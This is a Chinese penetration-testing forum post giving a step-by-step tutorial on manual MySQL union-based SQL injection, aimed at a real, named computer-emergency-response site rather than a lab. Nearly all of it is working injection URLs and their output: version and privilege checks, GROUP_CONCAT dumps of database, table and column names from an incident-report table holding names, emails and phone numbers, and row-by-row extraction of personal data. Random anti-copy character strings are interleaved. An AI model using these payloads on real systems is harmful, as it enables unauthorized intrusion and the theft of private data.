中国网络渗透测试联盟
标题:
.高级暴库方法讲解
[打印本页]
作者:
admin
时间:
2012-9-13 17:57
标题:
.高级暴库方法讲解
1.判断版本
http://www.cert.org.tw/document/advisory/detail.php?id=7
and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
% o9 s- v* c# x8 K/ j& J
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
3 R0 F# f4 G( }- C$ f
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,2,3,4,5,6,7,8,9--
2 b- ]6 [* z+ u! L/ x
3.查看数据库版本及当前用户,
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
6 u! J( E1 C. v" L" W1 {9 @
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
; x. f7 m' r- w. Z. q
4.判断有没有写权限
+ S* z3 g9 B. A6 V
http://www.cert.org.tw/document/advisory/detail.php?id=7
and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
1 k8 Q- y5 ^% p
没办法,手动猜表啦
( j4 m7 ~ ?6 q* u
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
# ~+ D0 O% K; a
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
( |+ U6 t+ @( K
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
2 {- X0 ~3 D6 w9 a7 k( V; f
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
: g' m8 `0 u! A1 S0 j# r
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
* ^% T5 J5 C3 U0 v$ h
6.爆表,爆的是twcert库
& G8 l! g0 V) _' w: Q# W3 x
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
7 |# L4 Z- P( i3 H
爆出如下表
, O4 i' M7 I& g! Z6 q
downloadfile,irsys,newsdata,secrpt,secrpt_big5
. x, @6 |' d4 c0 T# b: M% Y& ~; [
7.爆列名,这次爆的是irsys表
; u* B! P! S# U0 q; z% c, c% C
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
8 ^6 R- A, G# e+ }3 Q3 V) y
爆出如下列
7 }9 s( V7 g' e5 H6 Y7 z
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
0 f9 U9 r* @2 w l" n9 }
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
6 M4 P3 ~) z( X5 _* F% t
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
1 ^5 }! J9 X+ F
返回是3,说明每个列里有3个地段
. J" z" a& C0 i+ I2 W. U4 `
9.爆字段内容
$ ^0 k# i0 Q& @
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
. ~' d6 ?+ Q6 R* ~
爆出name列的第一个字段的内容
. H6 ^4 s9 z, W1 ?
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
; S5 O) _; a! f( K3 E2 g. u) y
爆出name列的第二个字段的内容
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2